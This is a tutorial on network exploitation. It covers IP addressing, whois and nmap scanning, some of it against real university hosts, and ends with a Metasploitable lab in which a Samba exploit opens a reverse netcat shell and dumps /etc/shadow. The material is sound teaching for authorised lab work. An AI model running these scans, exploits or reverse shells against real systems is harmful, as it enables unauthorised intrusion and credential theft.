# Network Exploitation - nmap and Metasploit

## Network Recon

Finding a target device to attack depends on the hacker’s objectives and may be opportunistic or targeted.

Either way, the first step in remote exploitation is to discover the target and gather After all, one cannot exploit a host that does not exist! The next step consists of gathering public information about the target, including what ports are open and which applications are available over the network.

Recall an IPv4 address is specified by 4 bytes (32 bits), constituting an integer value between 0 and 2^32-1. Typically an IP address is written as four base-10 octets UUU.VVV.WWW.XXX where UUU, VVV, WWW, and XXX are in the range 0..255. For example, the IP address of uwo.ca is 129.100.0.79. The University of Western Ontario, however, administers many hosts… an entire network in fact.

We can use the CIDR notation to specify a network range. An IP range in this notation has the form UUU.VVV.WWW.XXX/YY where YY is an integer in the range 0..32 specifying how many of the top bits of the IP address are fixed.

Here are some examples:

• 129.100.0.79/24 would specify all hosts that vary in the lower 24 bits.
129.  0.  0.  0 = 10000001.00000000.00000000.00000000
129.255.255.255 = 10000001.11111111.11111111.11111111

• 129.100.0.79/32 would specify the the single host that uwo.ca resolves to
129.100.  0. 79 = 10000001.01100100.00000000.01001111

• 129.100.0.79/29 specifies the 2^(32-29)=8 hosts “closest” to uwo.ca (including itself).
129.100.  0. 72 = 10000001.01100100.00000000.01001000
129.100.  0. 79 = 10000001.01100100.00000000.01001111

• 129.100.0.79/0 specifies the entire IPv4 space!

#### IPv6

IPv6 uses a 128-bit (16 byte) address usually represented as eight groups of 4 hexadecimal characters, for example:

2001:0db8:0a0b:12f0:0000:0000:0000:0001


which can also be expressed in a compressed form to suppress leading zeros:

2001:db8:a0b:12f0::1


### Whois

Suppose a penetration tester is hired to perform an evaluation of a The University of Western Ontario. The permission to conduct this evaluation (if it were for real) would obviously exist between the tester and Western, so the tester would first want to confirm which IP addresses belong to Western.

They can start by gathering basic public information about the domain uwo.ca from the ARIN:

$whois uwo.ca Domain name: uwo.ca Domain status: registered Creation date: 2000/10/13 Expiry date: 2020/01/12 Updated date: 2010/10/15 DNSSEC: Unsigned Registrar: Name: Webnames.ca Inc. Number: 70 Registrant: Name: The University of Western Ontario Administrative contact: Name: Jeff Grieve Postal address: Support Services Building Rm 4359 London ON N6A3K7 Canada Phone: +1.5196612151 Fax: +1.5196613486 Email: jeffg@uwo.ca Technical contact: Name: Ed Gibson Postal address: Support Services Building rm 4300 London ON N6A3K7 Canada Phone: +1.5196612151 Fax: +1.5196613486 Email: noc@uwo.ca Name servers: ns1.uwo.ca 129.100.2.12 ns2.uwo.ca 129.100.2.51 ns3.uwo.ca 129.100.74.79  Next the tester should confirm the IP range owned by Western. This is crucial for the tester not only to narrow their search space, but also to ensure they do not try to hack into a host without permission. Even if the company states its IP range in the contract, the tester would want to confirm it. The tester might first seek to determine the IP address of the company’s main website: $ nslookup uwo.ca
Server:   209.222.18.222

Name: uwo.ca


We see uwo.ca has IP address 129.100.0.79. Next we can consult the Whois database to get information about the owner of this address:

$whois 129.100.0.79 # ARIN WHOIS data and services are subject to the Terms of Use NetRange: 129.100.0.0 - 129.100.255.255 CIDR: 129.100.0.0/16 NetName: UWO-NET NetHandle: NET-129-100-0-0-1 Parent: NET129 (NET-129-0-0-0-0) NetType: Direct Assignment OriginAS: Organization: University of Western Ontario (UWO) RegDate: 1987-10-27 Updated: 2014-02-28 Ref: http://whois.arin.net/rest/net/NET-129-100-0-0-1 OrgName: University of Western Ontario OrgId: UWO Address: Information Technology Services Address: 1393 Western Road Address: Rm SSB 4352 City: London StateProv: ON PostalCode: N6G-1G9 Country: CA RegDate: 1987-10-27 Updated: 2012-08-31 Ref: http://whois.arin.net/rest/org/UWO  Here we see Western owns a class B network consisting of IPs in the range 129.100.0.0 to 129.100.255.255. We also see that Western registered uwo.ca in 1987, several years before the web was even invented! Of course they were actively using email and FTP and other early internet services. ### Ports A port is a software abstraction Just as IP addresses are used to identify machines on a network, ports identify specific applications running on a machine. Ports can range in value from 1 to 65535 #### Reserved Ports Ports in the range 1 to 1023 are reserved ports, and Unix systems require applications have root privileges to bind to these ports. This gives visitors to a site some assurance they are connecting to a valid system service initiated by the system administrator, and not some unprivileged user. For example, the typical port for ssh is 22. ## nmap nmap is a well known network scanning tool for discovering hosts and services. It has a wide range of scanning methods and plugins. ### Passive Host Discovery Passive scans are a good place to start gathering basic information about a host. They have the of benefit of being stealthy as they do not contact the host. Using nmap you can use the -sL “list scan” option to do reverse-DNS lookups on neighboring IP addresses. For example: $ nmap -sL www.uwo.ca/24


will tell you the host names of all the hosts on the class A network shared by uwo.ca. This will potentially allow us to discover interesting host names, such as this one:

Nmap scan report for owl.uwo.ca (129.100.0.33)


### Active Host Discovery

Active scans are less stealthy than passive scans since they actually directly contact the host. This however allows you to gain more information that you could with a passive scan alone, such as if the host is even currently online.

The -sn option in nmap performs basic host detection (i.e., skips the more detailed port scan).

$nmap -sn <IP or hostname>/<mask>  The IANA maintains a number of special use domains for the purposes of basic illustrative examples in documents. One such domain is example.com, which you can use to provide another concrete example of nmap’s basic use: $ nmap -sn example.com

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.023s latency).
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds


### Port Scanning

Port scanning can used to gain information about what kinds of software and services might be available on a host. Without specifying any options, nmap will do an initial host discovery followed by a basic port scan,

$nmap example.com Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST Nmap scan report for example.com (93.184.216.34) Host is up (0.022s latency). Not shown: 993 filtered ports PORT STATE SERVICE 53/tcp closed domain 80/tcp open http 443/tcp open https 554/tcp closed rtsp 1119/tcp closed bnetgame 1755/tcp closed wms 1935/tcp closed rtmp  Similarly you can use this command to discover hosts and services on your home network, substitute your internal network IP range. First you need to find your own device’s IP address, which you can do in a terminal: $ ifconfig
inet6 8f80::a28:23af:fe71:b4af  prefixlen 64  scopeid 0x20<link>
RX packets 71  bytes 15823 (15.4 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 16  bytes 2304 (2.2 KiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


Here our IP address is 192.168.1.3 so we can proceed to scan the home network, i.e. 192.168.1.0 to 192.168.1.255 using any number of equivalent commands including:

nmap 192.168.1.0/24
nmap 192.168.1.3/24
nmap 192.168.1.*


The -sV option performs version detection of the services. This doesn’t always work, especially if the sys admins have taken steps to obfuscate it. In other cases we can learn which server version and OS the target is running. For example, we see eng.uwo.ca is running Windows:

$nmap -sV eng.uwo.ca Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:49 EST Nmap scan report for eng.uwo.ca (129.100.225.244) Host is up (0.0026s latency). rDNS record for 129.100.225.244: ebithp8.eng.uwo.ca Not shown: 992 filtered ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 80/tcp open http Microsoft IIS httpd 7.0 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 7937/tcp open rpcbind 7938/tcp open rpcbind 8089/tcp open rpcbind 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows  The -A option prints a more detailed information about services, and used with the -sS option it can be reasonably fast. Metasploitable for example is made purposefully vulnerable to facilitate pen-testing education). For example, this would reveal that it is running Ubuntu on Apache 2.2.8: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux  ## Metasploit and Metasploitable Metasploit is a customizable exploitation framework for penetration testing. It provides a (somewhat) easy to use interface for managing and deploying exploits. Metasploitable is an intentionally vulnerable version of Linux which allows us to explore exploitation techniques in a sandboxed environment. ### Virtual Pen-Testing Lab We begin downloading Metasploitable 2 (about 800MB) and Kali Linux Virtual Box image. Next we configure them to use an internal (virtual) network. ### Step 1: Host Discovery The first step will be for us to discover available hosts: $ nmap -sn 192.168.1.1/29

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:32 EST
Nmap scan report for 192.168.1.1
Host is up (0.00026s latency).
MAC Address: 08:00:27:CB:C4:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.2
Host is up (0.00020s latency).
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)


Here we see a host available at 192.168.1.2

### Step 2: Port Scanning

Next we can scan 192.168.1.2 to explore its port configuration. In particular we’d like to get a little more detailed information about what application versions are running so we’ll use the -sV option.

$nmap -sV 192.168.1.2 Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:33 EST Nmap scan report for 192.168.1.2 Host is up (0.00015s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION ... <additional results> ... 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  Metasploitable is configured to have many ports open (to allow many possible avenues for exploitation). In particular we notice port 139 is running Samba 3.X. Interesting. You look up Samba on Wikipedia and read that: Some versions of Samba 3.6.3 and lower suffer serious security issues which can allow anonymous users to gain root access to a system from an anonymous connection. ### Step 3: Exploit 1. Initialize the Metasploit database and start the msfconsole: $ service postgresql start
$msfdb init$ msfconsole


Next check to make sure that the database has connected. Typing:

msf > db_status


Should return:

[*] postgresql connected to msf3


The first time you run Metasploit, you should build the database cache to allow for faster searching:

msf > db_rebuild_cache


This may take 5-10 minutes, so grab a coffee, and restart msfconsole when you come back.

Next we want to search for Samba related exploits:

msf > search samba

Matching Modules
================

Name                                            Disclosure Date  Rank       Description
----                                            ---------------  ----       -----------

...

exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution


Here see see an Excellent-ranked Samba exploit which we can use. Next we load the exploit:

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RPORT  139              yes       The target port

Exploit target:

Id  Name
--  ----
0   Automatic


We see that this exploit requires us to specify RHOST, i.e., the remote host’s IP address, and RPORT the target port.

msf exploit(usermap_script) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(usermap_script) > set LPORT 666
LPORT => 666
msf exploit(usermap_script) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(usermap_script) > set RPORT 139
RPORT => 139
msf exploit(usermap_script) > set TARGET 0
TARGET => 0


Now that the exploit is configured and ready, the final step is to specify the payload, i.e., the malicious code we wish to deliver via the exploit. We need to see which payloads are compatible by typing:

msf > show payloads


to receive a list. We’re going to use a netcat based reverse TCP shell:

msf > set payload cmd/unix/reverse_netcat


msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.3:666
msf exploit(usermap_script) > [*] Command shell session 1 opened (192.168.1.3:666 -> 192.168.1.2:38741) at 2016-02-22 12:08:50 -0500


Now if we type sessions we get

Active sessions
===============

Id  Type        Information  Connection
--  ----        -----------  ----------
1   shell unix               192.168.1.3:666 -> 192.168.1.2:38741 (192.168.1.2)


So now we want to bind to the active session:

msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...


After a few moments you will be able to type commands!

cat /etc/shadow
root:$1$/avpfBJ1\$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::